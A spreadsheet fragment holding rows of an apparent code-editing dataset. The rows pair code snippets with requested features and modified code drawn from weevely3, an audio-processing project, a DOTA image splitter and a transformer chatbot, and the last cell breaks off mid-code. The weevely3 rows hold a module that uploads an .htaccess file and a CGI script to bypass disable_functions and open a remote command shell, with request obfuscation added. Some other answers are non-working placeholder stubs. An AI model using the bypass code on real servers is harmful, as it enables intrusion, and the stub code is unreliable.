    <t>{'called_code_segment': "def request(url, headers = []):\n    \n    if not next((x for x in headers if x[0] == 'User-Agent'), False):\n        headers = [ ('User-Agent', random.choice(load_all_agents())) ]\n\n    opener = urllib.request.build_opener()\n    opener.addheaders = headers\n    return opener.open(url).read()", 'invoking_code_segment': "result_request = http.request(command_query).decode('utf-8')\n\nreturn query_random_str in result_request\n\n...\n\nlog.info(http.request('%s?c=%s' % (script_url, query)).decode())", 'feature_description': 'Add obfuscation to HTTP requests to avoid caching by proxies by implementing random parameter injection based on the add_random_param_nocache configuration setting', 'modified_complete_code': '# weevely3/core/config.py\n# Base path for log files and sessions\nbase_path = \'~/.weevely/\'\n\n# History path\nhistory_path = \'~/.weevely/history\'\n\n# Session path\nsessions_path = \'~/.weevely/sessions/\'\nsessions_ext = \'.session\'\n\n# Supported Channels\nchannels = [\n    # Obfuscated channel inside POST requests introduced \n    # in Weevely 3.6\n    \'ObfPost\',\n]\n\n# Append random GET parameters to every request to\n# make sure the page is not cache by proxies.\nadd_random_param_nocache = True  # #Modify: Changed from False to True to enable obfuscation\n\n# Add additional headers to be sent at every request e.g.\n# additional_headers = [\n#   ( \'Authentication\', \'Basic QWxhZGRpbjpvcGVuIHNlc2FtBl==\' )\n# ]\nadditional_headers = []\n\n# Agents and obfuscators used by generator.py\nagent_templates_folder_path = \'bd/agents/\'\nobfuscators_templates_folder_path = \'bd/obfuscators/\'\n\n#######################################\n# Resolve given paths - DO NOT CHANGE #\n#######################################\nimport os, sys\nbase_path = os.path.expanduser(base_path)\nhistory_path = os.path.expanduser(history_path)\nsessions_path = os.path.expanduser(sessions_path)\nweevely_path = os.path.dirname(os.path.realpath(sys.argv[0]))\nagent_templates_folder_path = os.path.join(\n    weevely_path,\n    agent_templates_folder_path\n)\nobfuscators_templates_folder_path = os.path.join(\n    weevely_path,\n    obfuscators_templates_folder_path\n)\n\n---\n\n# weevely3/utils/http.py\nfrom core.weexceptions import FatalException\nfrom core import messages\nfrom core import config\nimport random\nimport string\nimport utils\nimport urllib.request, urllib.error, urllib.parse\nimport os\n\nagents_list_path = \'utils/_http/user-agents.txt\'\n\ndef load_all_agents():\n\n    try:\n\n        with open(\n            os.path.join(config.weevely_path,\n            agents_list_path)\n            ) as agents_file:\n            return agents_file.read().split(\'\\n\')\n\n    except Exception as e:\n        raise FatalException(\n            messages.generic.error_loading_file_s_s %\n            (agents_list_path, str(e)))\n\n\ndef add_random_url_param(url):\n\n    random_param = \'%s=%s\' % (\n        utils.strings.randstr(\n            n = 4,\n            fixed = False,\n            charset = string.ascii_letters\n        ),\n        utils.strings.randstr(\n            n = 10,\n            fixed = False\n        )\n    )\n\n    if \'?\' not in url:\n        url += \'?%s\' % random_param\n    else:\n        url += \'&amp;%s\' % random_param\n\n    return url\n\ndef request(url, headers = []):  # #Modify: Enhanced to support obfuscation\n    \n    # #New: Apply obfuscation if enabled in config\n    if config.add_random_param_nocache:\n        url = add_random_url_param(url)\n    \n    if not next((x for x in headers if x[0] == \'User-Agent\'), False):\n        headers = [ (\'User-Agent\', random.choice(load_all_agents())) ]\n\n    opener = urllib.request.build_opener()\n    opener.addheaders = headers\n    return opener.open(url).read()\n\n---\n\n# weevely3/modules/audit/disablefunctionbypass.py\nfrom core.vectors import PhpCode, ShellCmd, ModuleExec, Os\nfrom core.module import Module, Status\nfrom core.loggers import log\nfrom core import modules\nfrom core import messages\nfrom utils import strings\nfrom utils import http\nimport string\nimport os\n\nclass Disablefunctionbypass(Module):\n\n    """Bypass disable_function restrictions with mod_cgi and .htaccess."""\n\n    def init(self):\n\n        self.register_info(\n            {\n                \'author\': [\n                    \'Emilio Pinna\',\n                    # mod_cgi + .htaccess bypassing technique by ASDIZZLE\n                    # https://blog.asdizzle.com/index.php/2016/05/02/getting-shell-access-with-php-system-functions-disabled/\n                    \'ASDIZZLE\'                 ],\n                \'license\': \'GPLv3\'\n            }\n        )\n\n        self.register_arguments([\n            { \'name\' : \'rpath\', \'help\' : \'Remote path. If it is a folder find the first writable folder in it\', \'default\' : \'.\', \'nargs\' : \'?\' },\n            { \'name\' : \'-script\', \'help\' : \'CGI script to upload\', \'default\' : os.path.join(self.folder, \'cgi.sh\') },\n            { \'name\' : \'-just-run\', \'help\' : \'Skip install and run shell through URL\' },\n        ])\n\n        self.register_vectors( [\n            PhpCode(\n                """(is_callable(\'apache_get_modules\')&amp;&amp;in_array(\'mod_cgi\', apache_get_modules())&amp;&amp;print(1))||print(0);""",\n                postprocess = lambda x: True if x == \'1\' else False,\n                name = \'mod_cgi\'\n            ),\n            ModuleExec(\n                \'file_upload2web\', \n                [ \'/bogus/.htaccess\', \'-content\', \'Options +ExecCGI\\nAddHandler cgi-script .${extension}\' ],\n                name = \'install_htaccess\'\n            ),\n            ModuleExec(\n                \'file_upload\', \n                [ \'${script}\', \'${rpath}\' ],\n                name = \'install_script\'\n            ),\n            PhpCode(\n                """(is_callable(\'chmod\')&amp;&amp;chmod(\'${rpath}\', 0777)&amp;&amp;print(1))||print(0);""",\n                postprocess = lambda x: True if x == \'1\' else False,\n                name = \'chmod\'\n            ),\n            ModuleExec(\n                \'file_rm\', \n                [ \'${path}\' ],\n                name = \'remove\'\n            ),\n        ])\n\n    def _clean(self, htaccess_absolute_path, script_absolute_path):\n\n        log.warning(\'Deleting %s and %s\' % (htaccess_absolute_path, script_absolute_path))\n        self.vectors.get_result(\'remove\', format_args = { \'path\': htaccess_absolute_path })\n        self.vectors.get_result(\'remove\', format_args = { \'path\': script_absolute_path })\n\n    def _install(self):\n\n        if not self.vectors.get_result(\'mod_cgi\'):\n            log.warning(messages.module_audit_disablefunctionbypass.error_mod_cgi_disabled)\n            return\n\n        filename = strings.randstr(5, charset = string.ascii_lowercase).decode(\'utf-8\')\n        ext = strings.randstr(3, charset = string.ascii_lowercase).decode(\'utf-8\')\n\n        result_install_htaccess = self.vectors.get_result(\n            \'install_htaccess\', \n            format_args = { \'extension\': ext }\n        )\n        if (\n            not result_install_htaccess or \n            not result_install_htaccess[0][0] or \n            not result_install_htaccess[0][1]\n            ):\n            log.warning(messages.module_audit_disablefunctionbypass.error_installing_htaccess)\n            return\n\n        htaccess_absolute_path = result_install_htaccess[0][0]\n        script_absolute_path = \'%s.%s\' % (htaccess_absolute_path.replace(\'.htaccess\', filename), ext)\n        script_url = \'%s.%s\' % (\n            result_install_htaccess[0][1].replace(\'.htaccess\', filename), \n            ext\n        )\n\n        result_install_script = self.vectors.get_result(\n            \'install_script\',\n            format_args = { \'script\' : self.args.get(\'script\'), \'rpath\': script_absolute_path }\n        )\n        if not result_install_script:\n            log.warning(messages.module_audit_disablefunctionbypass.error_uploading_script_to_s % script_absolute_path)\n            self._clean(htaccess_absolute_path, script_absolute_path)\n            return\n\n        result_chmod = self.vectors.get_result(\n            \'chmod\', \n            format_args = { \'rpath\': script_absolute_path }\n        )\n        if not result_chmod:\n            log.warning(messages.module_audit_disablefunctionbypass.error_changing_s_mode % script_absolute_path)\n            self._clean(htaccess_absolute_path, script_absolute_path)\n            return\n\n        if not self._check_response(script_url):\n            log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))\n            self._clean(htaccess_absolute_path, script_absolute_path)\n            return\n\n        log.warning(messages.module_audit_disablefunctionbypass.cgi_installed_remove_s_s % (htaccess_absolute_path, script_absolute_path))\n        log.warning(messages.module_audit_disablefunctionbypass.run_s_skip_reinstalling % (script_url))\n\n        return script_url\n\n    def _check_response(self, script_url):  # #Modify: Now uses obfuscated http.request\n\n        script_query = \'%s?c=\' % (script_url)\n        query_random_str = strings.randstr(5).decode(\'utf-8\')\n        command_query = \'%secho%%20%s\' % (script_query, query_random_str)\n\n        result_request = http.request(command_query).decode(\'utf-8\')  # #Modify: Automatically obfuscated via config\n\n        return query_random_str in result_request\n\n\n    def run(self, **kwargs):\n\n        # Terminate if shell_sh is active\n        if self.session[\'shell_sh\'][\'status\'] == Status.RUN:\n            log.warning(messages.module_audit_disablefunctionbypass.error_sh_commands_enabled)\n            return\n\n        # Install if -just-run option hasn\'t been provided, else directly check the backdoor\n        script_url = self.args.get(\'just_run\')\n        if not script_url:\n            script_url = self._install()\n            if not script_url:\n                return\n        elif not self._check_response(script_url):\n                log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))\n                return\n\n        log.warning(messages.module_audit_disablefunctionbypass.requests_not_obfuscated)\n\n        # Console loop\n        while True:\n\n            query = input(\'CGI shell replacement $ \').strip().replace(\' \', \'%20\')\n\n            if not query:\n                continue\n            if query == \'quit\':\n                break\n\n            log.info(http.request(\'%s?c=%s\' % (script_url, query)).decode())  # #Modify: Automatically obfuscated via config'}</t>
  </si>
  <si>
    <t>{'file_1': "def request(url, headers = []):\n    if not next((x for x in headers if x[0] == 'User-Agent'), False):\n        headers = [ ('User-Agent', random.choice(load_all_agents())) ]\n    opener = urllib.request.build_opener()\n    opener.addheaders = headers\n    return opener.open(url).read()\n\n#Modify\ndef obfuscate_request(url, headers = []):\n    obfuscated_url = add_random_url_param(url)\n    return request(obfuscated_url, headers)", 'file_2': "def _check_response(self, script_url):\n    script_query = '%s?c=' % (script_url)\n    query_random_str = strings.randstr(5).decode('utf-8')\n    command_query = '%secho%%20%s' % (script_query, query_random_str)\n    result_request = http.obfuscate_request(command_query).decode('utf-8')\n    return query_random_str in result_request", 'file_3': "def run(self, **kwargs):\n    script_url = self.args.get('just_run')\n    if not script_url:\n        script_url = self._install()\n        if not script_url:\n            return\n    elif not self._check_response(script_url):\n            log.warning(messages.module_audit_disablefunctionbypass.error_s_unexpected_output % (script_url))\n            return\n    log.warning(messages.module_audit_disablefunctionbypass.requests_not_obfuscated)\n    while True:\n        query = input('CGI shell replacement $ ').strip().replace(' ', '%20')\n        if not query:\n            continue\n        if query == 'quit':\n            break\n        log.info(http.obfuscate_request('%s?c=%s' % (script_url, query)).decode())", 'file_4': 'def obfuscate_request(url, headers = []):\n    obfuscated_url = add_random_url_param(url)\n    return request(obfuscated_url, headers)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def read_audio(filename, sample_rate=c.SAMPLE_RATE):\n    audio, sr = librosa.load(filename, sr=sample_rate, mono=True)\n    audio = audio.flatten()\n    return audio', 'invoking_code_segment': "file_loader = read_audio\n\nvoxceleb_dev = [datum for datum in voxceleb if datum['subset']=='dev']\ntrain_dir = DeepSpeakerDataset(voxceleb = voxceleb_dev, dir=args.dataroot,n_triplets=args.n_triplets,loader = file_loader,transform=transform)", 'feature_description': 'Enhance the audio reading process by applying a high-pass filter to the audio data to remove low-frequency noise and improve audio quality for speaker recognition tasks.', 'modified_complete_code': '# Modified audio_processing.py\n\nimport numpy as np\nfrom python_speech_features import fbank, delta\nimport constants as c\nimport librosa\nfrom scipy import signal\n\n#New: Add high-pass filter function\ndef apply_highpass_filter(audio, sample_rate=c.SAMPLE_RATE, cutoff_freq=80):\n    """\n    Apply a high-pass filter to audio data to remove low-frequency noise.\n    \n    Args:\n        audio: Input audio signal\n        sample_rate: Sample rate of the audio\n        cutoff_freq: Cutoff frequency in Hz (default: 80 Hz)\n    \n    Returns:\n        Filtered audio signal\n    """\n    nyquist_freq = sample_rate / 2\n    normalized_cutoff = cutoff_freq / nyquist_freq\n    \n    # Design a high-pass Butterworth filter\n    b, a = signal.butter(4, normalized_cutoff, btype=\'high\')\n    filtered_audio = signal.filtfilt(b, a, audio)\n    \n    return filtered_audio\n\n#Modify: Update read_audio function to include high-pass filter\ndef read_audio(filename, sample_rate=c.SAMPLE_RATE, apply_filter=True, cutoff_freq=80):\n    audio, sr = librosa.load(filename, sr=sample_rate, mono=True)\n    audio = audio.flatten()\n    \n    #New: Apply high-pass filter if enabled\n    if apply_filter:\n        audio = apply_highpass_filter(audio, sample_rate=sample_rate, cutoff_freq=cutoff_freq)\n    \n    return audio\n\n#Modify: Update mk_MFB function to support high-pass filtering\ndef mk_MFB(filename, sample_rate=c.SAMPLE_RATE, use_delta=c.USE_DELTA, use_scale=c.USE_SCALE, use_logscale=c.USE_LOGSCALE, apply_filter=True, cutoff_freq=80):\n    audio, sr = librosa.load(filename, sr=sample_rate, mono=True)\n    \n    #New: Apply high-pass filter if enabled\n    if apply_filter:\n        audio = apply_highpass_filter(audio, sample_rate=sample_rate, cutoff_freq=cutoff_freq)\n    \n    filter_banks, energies = fbank(audio, samplerate=sample_rate, nfilt=c.FILTER_BANK, winlen=0.025)\n\n    if use_logscale:\n        filter_banks = 20 * np.log10(np.maximum(filter_banks, 1e-5))\n\n    if use_delta:\n        delta_1 = delta(filter_banks, N=1)\n        delta_2 = delta(delta_1, N=1)\n\n        filter_banks = normalize_frames(filter_banks, Scale=use_scale)\n        delta_1 = normalize_frames(delta_1, Scale=use_scale)\n        delta_2 = normalize_frames(delta_2, Scale=use_scale)\n\n        frames_features = np.hstack([filter_banks, delta_1, delta_2])\n    else:\n        filter_banks = normalize_frames(filter_banks, Scale=use_scale)\n        frames_features = filter_banks\n\n    np.save(filename.replace(\'.wav\', \'.npy\'), frames_features)\n    return\n\n#Modify: Update pre_process_inputs function to support high-pass filtering\ndef pre_process_inputs(signal_input=np.random.uniform(size=32000), target_sample_rate=8000, use_delta=c.USE_DELTA, apply_filter=True, cutoff_freq=80):\n    #New: Apply high-pass filter if enabled\n    if apply_filter:\n        signal_input = apply_highpass_filter(signal_input, sample_rate=target_sample_rate, cutoff_freq=cutoff_freq)\n    \n    filter_banks, energies = fbank(signal_input, samplerate=target_sample_rate, nfilt=c.FILTER_BANK, winlen=0.025)\n    delta_1 = delta(filter_banks, N=1)\n    delta_2 = delta(delta_1, N=1)\n\n    filter_banks = normalize_frames(filter_banks)\n    delta_1 = normalize_frames(delta_1)\n    delta_2 = normalize_frames(delta_2)\n\n    if use_delta:\n        frames_features = np.hstack([filter_banks, delta_1, delta_2])\n    else:\n        frames_features = filter_banks\n    \n    num_frames = len(frames_features)\n    network_inputs = []\n    import random\n    j = random.randrange(c.NUM_PREVIOUS_FRAME, num_frames - c.NUM_NEXT_FRAME)\n    frames_slice = frames_features[j - c.NUM_PREVIOUS_FRAME:j + c.NUM_NEXT_FRAME]\n    network_inputs.append(frames_slice)\n    return np.array(network_inputs)\n\n# Modified train_triplet.py - relevant section\n\n#Modify: Update file_loader assignment to use read_audio with filter enabled\nif args.mfb:\n    transform = transforms.Compose([\n        truncatedinputfromMFB(),\n        totensor()\n    ])\n    transform_T = transforms.Compose([\n        truncatedinputfromMFB(input_per_file=args.test_input_per_file),\n        totensor()\n    ])\n    file_loader = read_MFB\nelse:\n    #New: Create a wrapper function to apply high-pass filter during audio loading\n    def file_loader_with_filter(filename):\n        return read_audio(filename, sample_rate=c.SAMPLE_RATE, apply_filter=True, cutoff_freq=80)\n    \n    #Modify: Use the wrapper function as file_loader\n    file_loader = file_loader_with_filter\n    \n    transform = transforms.Compose([\n        truncatedinput(),\n        toMFB(),\n        totensor()\n    ])\n\n#Modify: Update makemfb section to apply high-pass filter\nif args.makemfb:\n    for datum in voxceleb:\n        mk_MFB((args.dataroot + \'/voxceleb1_wav/\' + datum[\'filename\'] + \'.wav\'), apply_filter=True, cutoff_freq=80)\n    print("Complete convert")'}</t>
  </si>
  <si>
    <t>{'#file 1': 'import librosa\nimport constants as c\n\n#Modify\ndef read_audio(filename, sample_rate=c.SAMPLE_RATE):\n    audio, sr = librosa.load(filename, sr=sample_rate, mono=True)\n    audio = audio.flatten()\n    # New feature: Apply a high-pass filter\n    audio = librosa.effects.preemphasis(audio)\n    return audio', '#file 2': 'from audio_processing import read_audio\n\n#Modify\nfile_loader = read_audio', '#file 3': 'from audio_processing import read_audio\n\n#Modify\nfile_loader = read_audio', '#file 4': 'import librosa\nimport constants as c\n\n#New\ndef enhanced_read_audio(filename, sample_rate=c.SAMPLE_RATE):\n    audio, sr = librosa.load(filename, sr=sample_rate, mono=True)\n    audio = audio.flatten()\n    # New feature: Apply a high-pass filter\n    audio = librosa.effects.preemphasis(audio)\n    return audio'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def splitdata(self, rate): imagelist = GetFileFromThisRootDir(self.imagepath) imagenames = [util.custombasename(x) for x in imagelist if (util.custombasename(x) != 'Thumbs')] if self.num_process == 1: for name in imagenames: self.SplitSingle(name, rate, self.ext) else: worker = partial(split_single_warp, split_base=self, rate=rate, extent=self.ext) self.pool.map(worker, imagenames)", 'invoking_code_segment': "def prepare_multi_scale_data(src_path, dst_path, gap=200, subsize=1024, scales=[0.5, 1.0, 1.5], num_process=32): dst_trainval_path = osp.join(dst_path, 'trainval_split') dst_test_base_path = osp.join(dst_path, 'test_split') dst_test_path = osp.join(dst_path, 'test_split/images') mkdir_if_not_exists(dst_path) mkdir_if_not_exists(dst_trainval_path) mkdir_if_not_exists(dst_test_base_path) mkdir_if_not_exists(dst_test_path) print('split train data') split_train = splitbase_trainval(osp.join(src_path, 'train'), dst_trainval_path, gap=gap, subsize=subsize, num_process=num_process) for scale in scales: split_train.splitdata(scale) print('split val data') split_val = splitbase_trainval(osp.join(src_path, 'val'), dst_trainval_path, gap=gap, subsize=subsize, num_process=num_process) for scale in scales: split_val.splitdata(scale) print('split test data') split_test = splitbase_test(osp.join(src_path, 'test/images'), dst_test_path, gap=gap, subsize=subsize, num_process=num_process) for scale in scales: split_test.splitdata(scale)", 'feature_description': 'Add a new feature to process data after splitting images. This includes adding a post-processing callback mechanism to the splitdata method that allows custom data processing operations to be executed after image splitting is complete. The feature enables users to define and apply transformations or validations to the split data without modifying the core splitting logic.', 'modified_complete_code': '# File 1: s2anet/DOTA_devkit/ImgSplit_multi_process.py - Modified splitbase class\n\nclass splitbase():\n    def __init__(self,\n                 basepath,\n                 outpath,\n                 code=\'utf-8\',\n                 gap=512,\n                 subsize=1024,\n                 thresh=0.7,\n                 choosebestpoint=True,\n                 ext=\'.png\',\n                 padding=True,\n                 num_process=8,\n                 post_process_callback=None  # #New: Add callback parameter\n                 ):\n        # ... existing code ...\n        self.num_process = num_process\n        self.pool = Pool(num_process)\n        self.post_process_callback = post_process_callback  # #New: Store callback\n        print(\'padding:\', padding)\n        # ... rest of existing code ...\n\n    # #New: Add method to execute post-processing\n    def execute_post_processing(self, output_dir):\n        """Execute post-processing callback if defined"""\n        if self.post_process_callback is not None:\n            self.post_process_callback(output_dir)\n\n    def splitdata(self, rate):\n        """\n        :param rate: resize rate before cut\n        """\n        imagelist = GetFileFromThisRootDir(self.imagepath)\n        imagenames = [util.custombasename(x) for x in imagelist if (\n                util.custombasename(x) != \'Thumbs\')]\n        if self.num_process == 1:\n            for name in imagenames:\n                self.SplitSingle(name, rate, self.ext)\n        else:\n            worker = partial(split_single_warp, split_base=self,\n                             rate=rate, extent=self.ext)\n            self.pool.map(worker, imagenames)\n        \n        # #New: Execute post-processing after splitting\n        self.execute_post_processing(self.outpath)\n\n# File 2: s2anet/DOTA_devkit/prepare_dota1_ms.py - Modified prepare_multi_scale_data function\n\n# #New: Add post-processing function\ndef post_process_split_data(output_dir):\n    """Post-process split data for validation and statistics"""\n    import os\n    label_dir = os.path.join(output_dir, \'labelTxt\')\n    image_dir = os.path.join(output_dir, \'images\')\n    \n    if os.path.exists(label_dir):\n        label_files = [f for f in os.listdir(label_dir) if f.endswith(\'.txt\')]\n        print(f\'Post-processing: Found {len(label_files)} label files in {output_dir}\')\n        # Additional validation or statistics can be added here\n\ndef prepare_multi_scale_data(src_path, dst_path, gap=200, subsize=1024, scales=[0.5, 1.0, 1.5], num_process=32):\n    dst_trainval_path = osp.join(dst_path, \'trainval_split\')\n    dst_test_base_path = osp.join(dst_path, \'test_split\')\n    dst_test_path = osp.join(dst_path, \'test_split/images\')\n    mkdir_if_not_exists(dst_path)\n    mkdir_if_not_exists(dst_trainval_path)\n    mkdir_if_not_exists(dst_test_base_path)\n    mkdir_if_not_exists(dst_test_path)\n\n    print(\'split train data\')\n    # #Modify: Add post_process_callback parameter\n    split_train = splitbase_trainval(osp.join(src_path, \'train\'), dst_trainval_path,\n                                     gap=gap, subsize=subsize, num_process=num_process,\n                                     post_process_callback=post_process_split_data)\n    for scale in scales:\n        split_train.splitdata(scale)\n    \n    print(\'split val data\')\n    # #Modify: Add post_process_callback parameter\n    split_val = splitbase_trainval(osp.join(src_path, \'val\'), dst_trainval_path,\n                                   gap=gap, subsize=subsize, num_process=num_process,\n                                   post_process_callback=post_process_split_data)\n    for scale in scales:\n        split_val.splitdata(scale)\n    \n    print(\'split test data\')\n    # #Modify: Add post_process_callback parameter\n    split_test = splitbase_test(osp.join(src_path, \'test/images\'), dst_test_path,\n                                gap=gap, subsize=subsize, num_process=num_process,\n                                post_process_callback=post_process_split_data)\n    for scale in scales:\n        split_test.splitdata(scale)\n\n    convert_dota_to_mmdet(dst_trainval_path,\n                          osp.join(dst_trainval_path, \'trainval1024.pkl\'))\n    convert_dota_to_mmdet(dst_test_base_path,\n                          osp.join(dst_test_base_path, \'test1024.pkl\'), trainval=False)\n    print(\'done!\')'}</t>
  </si>
  <si>
    <t>{'file_1': 'def splitdata(self, rate):\n    """\n    :param rate: resize rate before cut\n    """\n    imagelist = GetFileFromThisRootDir(self.imagepath)\n    imagenames = [util.custombasename(x) for x in imagelist if (\n            util.custombasename(x) != \'Thumbs\')]\n    if self.num_process == 1:\n        for name in imagenames:\n            self.SplitSingle(name, rate, self.ext)\n    else:\n        worker = partial(split_single_warp, split_base=self,\n                         rate=rate, extent=self.ext)\n        self.pool.map(worker, imagenames)\n    #Modify: Call new feature function\n    processed_data = new_feature_function(imagenames)\n    return processed_data', 'file_2': "def prepare_multi_scale_data(src_path, dst_path, gap=200, subsize=1024, scales=[0.5, 1.0, 1.5], num_process=32):\n    ...\n    split_train = splitbase_trainval(osp.join(src_path, 'train'), dst_trainval_path,\n                                     gap=gap, subsize=subsize, num_process=num_process)\n    for scale in scales:\n        processed_data = split_train.splitdata(scale)\n        #Modify: Handle processed data\n        handle_processed_data(processed_data)\n    ...\n    split_val = splitbase_trainval(osp.join(src_path, 'val'), dst_trainval_path,\n                                   gap=gap, subsize=subsize, num_process=num_process)\n    for scale in scales:\n        processed_data = split_val.splitdata(scale)\n        #Modify: Handle processed data\n        handle_processed_data(processed_data)\n    ...\n    split_test = splitbase_test(osp.join(src_path, 'test/images'), dst_test_path,\n                                gap=gap, subsize=subsize, num_process=num_process)\n    for scale in scales:\n        processed_data = split_test.splitdata(scale)\n        #Modify: Handle processed data\n        handle_processed_data(processed_data)", 'file_3': "def convert_dota_to_mmdet(src_path, dst_file, trainval=True):\n    ...\n    if trainval:\n        split_path = osp.join(src_path, 'trainval_split')\n    else:\n        split_path = osp.join(src_path, 'test_split')\n    ...\n    for split_file in os.listdir(split_path):\n        if split_file.endswith('.txt'):\n            split_file_path = osp.join(split_path, split_file)\n            with open(split_file_path, 'r') as f:\n                for line in f.readlines():\n                    parts = line.strip().split(' ')\n                    img_name = parts[0]\n                    bbox = list(map(float, parts[1:9]))\n                    label = parts[9]\n                    difficult = int(parts[10])\n                    ...\n                    data_dict['ann']['bboxes'].append(bbox)\n                    data_dict['ann']['labels'].append(label)\n                    data_dict['ann']['difficult'].append(difficult)\n    #Modify: Ensure compatibility with new feature\n    ensure_compatibility(data_dict)", 'file_4': 'def new_feature_function(data):\n    # New feature implementation\n    processed_data = process_data(data)\n    return processed_data\n\ndef process_data(data):\n    # Data processing logic\n    return processed_data\n\ndef handle_processed_data(processed_data):\n    # Logic to handle processed data\n    ...\n\ndef ensure_compatibility(data_dict):\n    # Logic to ensure compatibility with new feature\n    ...'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def beam_search(self, enc_contexts=[], return_beams=False):', 'invoking_code_segment': 'pred_texts = self.model.beam_search(enc_contexts)', 'feature_description': 'Add a new feature to preprocess text before prediction by introducing a text preprocessing pipeline that normalizes input contexts before they are encoded and passed to beam search, improving prediction quality through standardized text formatting.', 'modified_complete_code': '# File 1: transformer_chatbot/model/transformer_model.py\n# Add new preprocessing method to TransformerModel class\n\nclass TransformerModel(nn.Module):\n    def __init__(self, n_layers, n_embeddings, n_pos_embeddings, embeddings_size, \n                 padding_idx, n_heads, dropout, embed_dropout, attn_dropout, ff_dropout,\n                 bos_id, eos_id, max_seq_len=256, beam_size=5, sample=False,\n                 length_penalty=0.8, annealing_topk=None, annealing=0, \n                 diversity_coef=0, diversity_groups=1, n_segments=None):\n        # ... existing code ...\n        self.transformer_module = TransformerModule(n_layers, n_embeddings, n_pos_embeddings, embeddings_size, \n                                                    padding_idx, n_heads, dropout, embed_dropout, attn_dropout,\n                                                    ff_dropout, n_segments)\n        self.pre_softmax = nn.Linear(embeddings_size, n_embeddings, bias=False)\n        self.pre_softmax.weight = self.transformer_module.embeddings.weight\n\n    # #New: Add preprocessing method for text normalization\n    def preprocess_contexts(self, enc_contexts):\n        """Preprocess encoded contexts before beam search.\n        Applies normalization and validation to encoded contexts.\n        """\n        if not enc_contexts:\n            return enc_contexts\n        \n        processed_contexts = []\n        for context in enc_contexts:\n            if isinstance(context, tuple):\n                c, p = context\n                # #New: Normalize context tensors\n                c = c.float() / (c.abs().max() + 1e-8)\n                processed_contexts.append((c, p))\n            else:\n                processed_contexts.append(context)\n        \n        return processed_contexts\n\n    # #Modify: Update beam_search to use preprocessing\n    def beam_search(self, enc_contexts=[], return_beams=False):\n        with torch.no_grad():\n            # #New: Preprocess contexts before beam search\n            enc_contexts = self.preprocess_contexts(enc_contexts)\n            \n            if len(enc_contexts) == 0:\n                return []\n\n            batch_size = enc_contexts[0][0].shape[0]\n            device = next(self.parameters()).device\n\n            prevs = torch.full((batch_size * self.beam_size, 1), fill_value=self.bos_id, dtype=torch.long, device=device)\n            \n            beam_scores = torch.zeros(batch_size, self.beam_size, device=device)\n            beam_lens = torch.ones(batch_size, self.beam_size, dtype=torch.long, device=device)\n            is_end = torch.zeros(batch_size, self.beam_size, dtype=torch.uint8, device=device)\n\n            beam_enc_contexts = []\n            for c, p in enc_contexts:\n                c = c.unsqueeze(1).repeat(1, self.beam_size, 1, 1)\n                c = c.view(-1, c.shape[2], c.shape[3])\n                p = p.unsqueeze(1).repeat(1, self.beam_size, 1)\n                p = p.view(-1, p.shape[2])\n                beam_enc_contexts.append((c, p))\n            \n            current_sample_prob = 1\n            group_size = self.beam_size // self.diversity_groups\n            diversity_penalty = torch.zeros((batch_size, self.n_embeddings), device=device)\n\n            for i in range(self.max_seq_len):\n                outputs, _ = self.transformer_module(prevs, beam_enc_contexts)\n\n                logits = self.generate(outputs[:, -1, :])\n                log_probs = F.log_softmax(logits, dim=-1)\n                log_probs = log_probs.view(batch_size, self.beam_size, -1)\n\n                beam_scores = beam_scores.unsqueeze(-1) + log_probs * (1 - is_end.float().unsqueeze(-1))\n                penalty = self._length_penalty(beam_lens.float() + 1 - is_end.float())\n                penalty = penalty.unsqueeze(-1).repeat(1, 1, self.n_embeddings)\n                beam_scores = beam_scores / penalty\n\n                if i == 0:\n                    penalty = penalty[:, 0, :]\n                    beam_scores = beam_scores[:, 0, :]\n\n                    beam_scores, idxs = beam_scores.topk(self.beam_size, dim=-1)\n                    beam_idxs = torch.zeros((batch_size, self.beam_size), dtype=torch.long, device=device)\n                else:\n                    penalty = penalty.view(batch_size, self.diversity_groups, group_size, -1)\n                    beam_scores = beam_scores.view(batch_size, self.diversity_groups, group_size, -1)\n\n                    all_scores, all_idxs = [], []\n                    for g in range(self.diversity_groups):\n                        g_beam_scores = beam_scores[:, g, :, :]\n                        g_penalty = penalty[:, g, :, :]\n                        g_beam_scores -= self.diversity_coef * diversity_penalty.unsqueeze(1) / g_penalty\n                        g_beam_scores = g_beam_scores.view(batch_size, -1)\n\n                        if random.random() &lt; current_sample_prob:\n                            beam_probas = F.softmax(g_beam_scores, dim=-1)\n                            if self.annealing_topk is not None:\n                                beam_probas, sample_idxs = beam_probas.topk(self.annealing_topk, dim=-1)\n                                g_idxs = torch.multinomial(beam_probas, group_size)\n                                g_idxs = torch.gather(sample_idxs, 1, g_idxs)\n                            else:\n                                g_idxs = torch.multinomial(beam_probas, group_size)\n                        else:\n                            _, g_idxs = g_beam_scores.topk(group_size, dim=-1)\n                        \n                        g_scores = torch.gather(beam_scores[:, g, :, :].view(batch_size, -1), 1, g_idxs)\n                        g_idxs += g * group_size * self.n_embeddings\n\n                        all_scores.append(g_scores)\n                        all_idxs.append(g_idxs)\n\n                        diversity_penalty.scatter_add_(1, torch.fmod(g_idxs, self.n_embeddings), torch.ones((batch_size, group_size), device=device))\n                     \n                    diversity_penalty.fill_(0)\n                    penalty = penalty.view(batch_size, -1)\n                    beam_scores = torch.cat(all_scores, dim=-1)\n                    idxs = torch.cat(all_idxs, dim=-1) \n\n                    beam_idxs = (idxs.float() / self.n_embeddings).long()\n\n                penalty = torch.gather(penalty, 1, idxs)\n                sym_idxs = torch.fmod(idxs, log_probs.shape[-1])\n                is_end = torch.gather(is_end, 1, beam_idxs)\n                beam_lens = torch.gather(beam_lens, 1, beam_idxs)\n\n                sym_idxs[is_end] = self.padding_idx\n                beam_lens[~is_end] += 1\n                is_end[sym_idxs == self.eos_id] = 1\n\n                sym_idxs = sym_idxs.view(batch_size * self.beam_size, 1)\n                prevs = prevs.view(batch_size, self.beam_size, -1)\n                prevs = torch.gather(prevs, 1, beam_idxs.unsqueeze(-1).repeat(1, 1, prevs.shape[-1]))\n                prevs = prevs.view(batch_size * self.beam_size, -1)\n                prevs = torch.cat([prevs, sym_idxs], dim=1)\n\n                if all(is_end.view(-1)):\n                    break\n                \n                beam_scores *= penalty\n                current_sample_prob *= self.annealing\n\n            predicts = []\n            result = prevs.view(batch_size, self.beam_size, -1)\n\n            if return_beams:\n                 return result, beam_lens\n\n            if self.sample:\n                probs = F.softmax(beam_scores, dim=-1)\n                